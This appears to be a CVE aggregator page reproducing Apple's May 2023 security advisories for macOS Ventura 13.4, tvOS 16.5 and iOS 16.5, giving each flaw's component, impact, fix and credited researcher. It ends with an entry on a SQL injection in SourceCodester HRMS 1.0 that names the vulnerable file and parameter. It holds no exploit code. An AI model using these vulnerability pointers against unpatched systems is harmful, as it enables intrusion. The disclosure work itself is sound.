A permissions issue was addressed by removing vulnerable code and adding additional checks. This issue is fixed in macOS Ventura 13.4. An app may be able to bypass Privacy preferences

Released May 18, 2023

**Accessibility**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32388: Kirin (@Pwnrin)

**Accessibility**

Available for: macOS Ventura

Impact: Entitlements and privacy permissions granted to this app may be used by a malicious app

Description: This issue was addressed with improved checks.

CVE-2023-32400: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32411: Mickey Jin (@patch1t)

**Associated Domains**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-32371: James Duffy (mangoSecure)

**Contacts**

Available for: macOS Ventura

Impact: An app may be able to observe unprotected user data

Description: A privacy issue was addressed with improved handling of temporary files.

CVE-2023-32386: Kirin (@Pwnrin)

**Core Location**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32399: an anonymous researcher

**CoreServices**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-28191: Mickey Jin (@patch1t)

**CUPS**

Available for: macOS Ventura

Impact: An unauthenticated user may be able to access recently printed documents

Description: An authentication issue was addressed with improved state management.

CVE-2023-32360: Gerhard Muth

**dcerpc**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32387: Dimitrios Tatsis of Cisco Talos

**DesktopServices**

Available for: macOS Ventura

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-32414: Mickey Jin (@patch1t)

**GeoServices**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32392: an anonymous researcher

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32372: Meysam Firouzi of @R00tkitSMM Mbition mercedes-benz innovation lab working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: macOS Ventura

Impact: Processing an image may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-32384: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero Day Initiative

**IOSurface**

Available for: macOS Ventura

Impact: An app may be able to leak sensitive kernel state

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32410: hou xuewei (@p1ay8y3ar) vmk msu

**IOSurfaceAccelerator**

Available for: macOS Ventura

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32420: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2023-27930: 08Tc3wBB of Jamf

**Kernel**

Available for: macOS Ventura

Impact: A sandboxed app may be able to observe system-wide network connections

Description: The issue was addressed with additional permissions checks.

CVE-2023-27940: James Duffy (mangoSecure)

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32398: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: A race condition was addressed with improved state handling.

CVE-2023-32413: Eloi Benoist-Vanderbeken (@elvanderb) from Synacktiv (@Synacktiv) working with Trend Micro Zero Day Initiative

**LaunchServices**

Available for: macOS Ventura

Impact: An app may bypass Gatekeeper checks

Description: A logic issue was addressed with improved checks.

CVE-2023-32352: Wojciech Reguła (@\_r3ggi) of SecuRing (wojciechregula.blog)

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32369: Jonathan Bar Or of Microsoft, Anurag Bohra of Microsoft, and Michael Pearse of Microsoft

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to gain root privileges

Description: A logic issue was addressed with improved checks.

CVE-2023-32405: Thijs Alkemade (@xnyhps) from Computest Sector 7

**Metal**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2023-32407: Gergely Kalman (@gergely\_kalman)

**Model I/O**

Available for: macOS Ventura

Impact: Processing a 3D model may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32368: Mickey Jin (@patch1t)

CVE-2023-32375: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

CVE-2023-32382: Mickey Jin (@patch1t)

**Model I/O**

Available for: macOS Ventura

Impact: Processing a 3D model may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2023-32380: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32403: an anonymous researcher

**PackageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32355: Mickey Jin (@patch1t)

**PDFKit**

Available for: macOS Ventura

Impact: Opening a PDF file may lead to unexpected app termination

Description: A denial-of-service issue was addressed with improved memory handling.

CVE-2023-32385: Jonathan Fritz

**Perl**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32395: Arsenii Kostromin (0x3c3e)

**Photos**

Available for: macOS Ventura

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: The issue was addressed with improved checks.

CVE-2023-32390: Julian Szulc

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to retain access to system configuration files even after its permission is revoked

Description: An authorization issue was addressed with improved state management.

CVE-2023-32357: Yiğit Can YILMAZ (@yilmazcanyigit), Koh M. Nakagawa of FFRI Security, Inc., Kirin (@Pwnrin), Jeff Johnson (underpassapp.com), and Csaba Fitzl (@theevilbit) of Offensive Security

**Screen Saver**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: A permissions issue was addressed by removing vulnerable code and adding additional checks.

CVE-2023-32363: Mickey Jin (@patch1t)

**Security**

Available for: macOS Ventura

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed with improved entitlements.

CVE-2023-32367: James Duffy (mangoSecure)

**Shell**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: A logic issue was addressed with improved state management.

CVE-2023-32397: Arsenii Kostromin (0x3c3e)

**Shortcuts**

Available for: macOS Ventura

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with improved checks.

CVE-2023-32391: Wenchao Li and Xiaolong Bai of Alibaba Group

**Shortcuts**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32404: Mickey Jin (@patch1t), Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com), and an anonymous researcher

**Siri**

Available for: macOS Ventura

Impact: A person with physical access to a device may be able to view contact information from the lock screen

Description: The issue was addressed with improved checks.

CVE-2023-32394: Khiem Tran

**SQLite**

Available for: macOS Ventura

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by adding additional SQLite logging restrictions.

CVE-2023-32422: Gergely Kalman (@gergely\_kalman), and Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated June 2, 2023

**StorageKit**

Available for: macOS Ventura

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2023-32376: Yiğit Can YILMAZ (@yilmazcanyigit)

**System Settings**

Available for: macOS Ventura

Impact: An app firewall setting may not take effect after exiting the Settings app

Description: This issue was addressed with improved state management.

CVE-2023-28202: Satish Panduranga and an anonymous researcher

**Telephony**

Available for: macOS Ventura

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32412: Ivan Fratric of Google Project Zero

**TV App**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32408: Adam M.

**Weather**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32415: Wojciech Regula of SecuRing (wojciechregula.blog), and an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 255075  
CVE-2023-32402: an anonymous researcher

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 254781  
CVE-2023-32423: Ignacio Sanmillan (@ulexec)

**WebKit**

Available for: macOS Ventura

Impact: A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

WebKit Bugzilla: 255350  
CVE-2023-32409: Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab

**WebKit**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 254930  
CVE-2023-28204: an anonymous researcher

_This issue was first addressed in Rapid Security Response macOS 13.3.1 (a)._

**WebKit**

Available for: macOS Ventura

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 254840  
CVE-2023-32373: an anonymous researcher

_This issue was first addressed in Rapid Security Response macOS 13.3.1 (a)._

**Wi-Fi**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32389: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

CVE-2023-32363: About the security content of macOS Ventura 13.4

A type confusion issue was addressed with improved checks. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5, tvOS 16.5. An app may be able to execute arbitrary code with kernel privileges

Released May 18, 2023

**AppleMobileFileIntegrity**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32411: Mickey Jin (@patch1t)

**Core Location**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32399: an anonymous researcher

**CoreServices**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-28191: Mickey Jin (@patch1t)

**GeoServices**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32392: an anonymous researcher

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing an image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32372: Meysam Firouzi of @R00tkitSMM Mbition mercedes-benz innovation lab working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing an image may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-32384: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero Day Initiative

**IOSurfaceAccelerator**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32354: Linus Henze of Pinauten GmbH (pinauten.de)

**IOSurfaceAccelerator**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32420: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2023-27930: 08Tc3wBB of Jamf

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32398: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to gain root privileges

Description: A race condition was addressed with improved state handling.

CVE-2023-32413: Eloi Benoist-Vanderbeken (@elvanderb) from Synacktiv (@Synacktiv) working with Trend Micro Zero Day Initiative

**Metal**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2023-32407: Gergely Kalman (@gergely\_kalman)

**Model I/O**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing a 3D model may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32368: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32403: an anonymous researcher

**Sandbox**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to retain access to system configuration files even after its permission is revoked

Description: An authorization issue was addressed with improved state management.

CVE-2023-32357: Yiğit Can YILMAZ (@yilmazcanyigit), Koh M. Nakagawa of FFRI Security, Inc., Kirin (@Pwnrin), Jeff Johnson (underpassapp.com), and Csaba Fitzl (@theevilbit) of Offensive Security

**Siri**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A person with physical access to a device may be able to view contact information from the lock screen

Description: The issue was addressed with improved checks.

CVE-2023-32394: Khiem Tran

**SQLite**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by adding additional SQLite logging restrictions.

CVE-2023-32422: Gergely Kalman (@gergely\_kalman), and Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated June 2, 2023

**StorageKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2023-32376: Yiğit Can YILMAZ (@yilmazcanyigit)

**System Settings**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app firewall setting may not take effect after exiting the Settings app

Description: This issue was addressed with improved state management.

CVE-2023-28202: Satish Panduranga and an anonymous researcher

**Telephony**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32412: Ivan Fratric of Google Project Zero

**TV App**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32408: Adam M.

**Weather**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32415: Wojciech Regula of SecuRing (wojciechregula.blog), and an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing web content may disclose sensitive information

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 255075  
CVE-2023-32402: an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing web content may disclose sensitive information

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 254781  
CVE-2023-32423: Ignacio Sanmillan (@ulexec)

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

WebKit Bugzilla: 255350  
CVE-2023-32409: Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 254930  
CVE-2023-28204: an anonymous researcher

**WebKit**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 254840  
CVE-2023-32373: an anonymous researcher

**Wi-Fi**

Available for: Apple TV 4K (all models) and Apple TV HD

Impact: An app may be able to disclose kernel memory

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32389: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

CVE-2023-27930: About the security content of tvOS 16.5

A denial-of-service issue was addressed with improved memory handling. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4. Opening a PDF file may lead to unexpected app termination

Released May 18, 2023

**Accessibility**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32388: Kirin (@Pwnrin)

**Accessibility**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Entitlements and privacy permissions granted to this app may be used by a malicious app

Description: This issue was addressed with improved checks.

CVE-2023-32400: Mickey Jin (@patch1t)

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32411: Mickey Jin (@patch1t)

**Associated Domains**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved checks.

CVE-2023-32371: James Duffy (mangoSecure)

**Cellular**

Available for: iPhone 8 and iPhone X

Impact: A remote attacker may be able to cause arbitrary code execution

Description: The issue was addressed with improved bounds checks.

CVE-2023-32419: Amat Cama of Vigilant Labs

**Core Location**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32399: an anonymous researcher

**CoreServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved redaction of sensitive information.

CVE-2023-28191: Mickey Jin (@patch1t)

**GeoServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: A privacy issue was addressed with improved private data redaction for log entries.

CVE-2023-32392: an anonymous researcher

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32372: Meysam Firouzi of @R00tkitSMM Mbition mercedes-benz innovation lab working with Trend Micro Zero Day Initiative

**ImageIO**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing an image may lead to arbitrary code execution

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2023-32384: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero Day Initiative

**IOSurfaceAccelerator**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32354: Linus Henze of Pinauten GmbH (pinauten.de)

**IOSurfaceAccelerator**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32420: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved checks.

CVE-2023-27930: 08Tc3wBB of Jamf

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32398: Adam Doupé of ASU SEFCOM

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to gain root privileges

Description: A race condition was addressed with improved state handling.

CVE-2023-32413: Eloi Benoist-Vanderbeken (@elvanderb) from Synacktiv (@Synacktiv) working with Trend Micro Zero Day Initiative

**LaunchServices**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may bypass Gatekeeper checks

Description: A logic issue was addressed with improved checks.

CVE-2023-32352: Wojciech Reguła (@\_r3ggi) of SecuRing (wojciechregula.blog)

**Metal**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: A logic issue was addressed with improved state management.

CVE-2023-32407: Gergely Kalman (@gergely\_kalman)

**Model I/O**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing a 3D model may result in disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-32368: Mickey Jin (@patch1t)

**NetworkExtension**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32403: an anonymous researcher

**PDFKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Opening a PDF file may lead to unexpected app termination

Description: A denial-of-service issue was addressed with improved memory handling.

CVE-2023-32385: Jonathan Fritz

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved checks.

CVE-2023-32365: Jiwon Park

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup

Description: The issue was addressed with improved checks.

CVE-2023-32390: Julian Szulc

**Sandbox**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to retain access to system configuration files even after its permission is revoked

Description: An authorization issue was addressed with improved state management.

CVE-2023-32357: Yiğit Can YILMAZ (@yilmazcanyigit), Koh M. Nakagawa of FFRI Security, Inc., Kirin (@Pwnrin), Jeff Johnson (underpassapp.com), and Csaba Fitzl (@theevilbit) of Offensive Security

**Security**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access user-sensitive data

Description: This issue was addressed with improved entitlements.

CVE-2023-32367: James Duffy (mangoSecure)

**Shortcuts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with improved checks.

CVE-2023-32391: Wenchao Li and Xiaolong Bai of Alibaba Group

**Shortcuts**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed with improved entitlements.

CVE-2023-32404: Mickey Jin (@patch1t), Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com), and an anonymous researcher

**Siri**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A person with physical access to a device may be able to view contact information from the lock screen

Description: The issue was addressed with improved checks.

CVE-2023-32394: Khiem Tran

**SQLite**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by adding additional SQLite logging restrictions.

CVE-2023-32422: Gergely Kalman (@gergely\_kalman), and Wojciech Reguła of SecuRing (wojciechregula.blog)

Entry updated June 2, 2023

**StorageKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed with improved entitlements.

CVE-2023-32376: Yiğit Can YILMAZ (@yilmazcanyigit)

**System Settings**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app firewall setting may not take effect after exiting the Settings app

Description: This issue was addressed with improved state management.

CVE-2023-28202: Satish Panduranga and an anonymous researcher

**Telephony**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to cause unexpected app termination or arbitrary code execution

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32412: Ivan Fratric of Google Project Zero

**TV App**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-32408: an anonymous researcher

**Weather**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32415: Wojciech Regula of SecuRing (wojciechregula.blog), and an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may disclose sensitive information

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 255075  
CVE-2023-32402: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may disclose sensitive information

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 254781  
CVE-2023-32423: Ignacio Sanmillan (@ulexec)

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved bounds checks.

WebKit Bugzilla: 255350  
CVE-2023-32409: Clément Lecigne of Google's Threat Analysis Group and Donncha Ó Cearbhaill of Amnesty International’s Security Lab

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.

Description: An out-of-bounds read was addressed with improved input validation.

WebKit Bugzilla: 254930  
CVE-2023-28204: an anonymous researcher

_This issue was first addressed in Rapid Security Response iOS 16.4.1 (a) and iPadOS 16.4.1 (a)._

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A use-after-free issue was addressed with improved memory management.

WebKit Bugzilla: 254840  
CVE-2023-32373: an anonymous researcher

_This issue was first addressed in Rapid Security Response iOS 16.4.1 (a) and iPadOS 16.4.1 (a)._

**Wi-Fi**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: This  issue was addressed with improved redaction of sensitive information.

CVE-2023-32389: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

CVE-2023-32385: About the security content of iOS 16.5 and iPadOS 16.5

A vulnerability was found in SourceCodester Human Resource Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file detailview.php. The manipulation of the argument employeeid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232288.

CVE-2023-3391

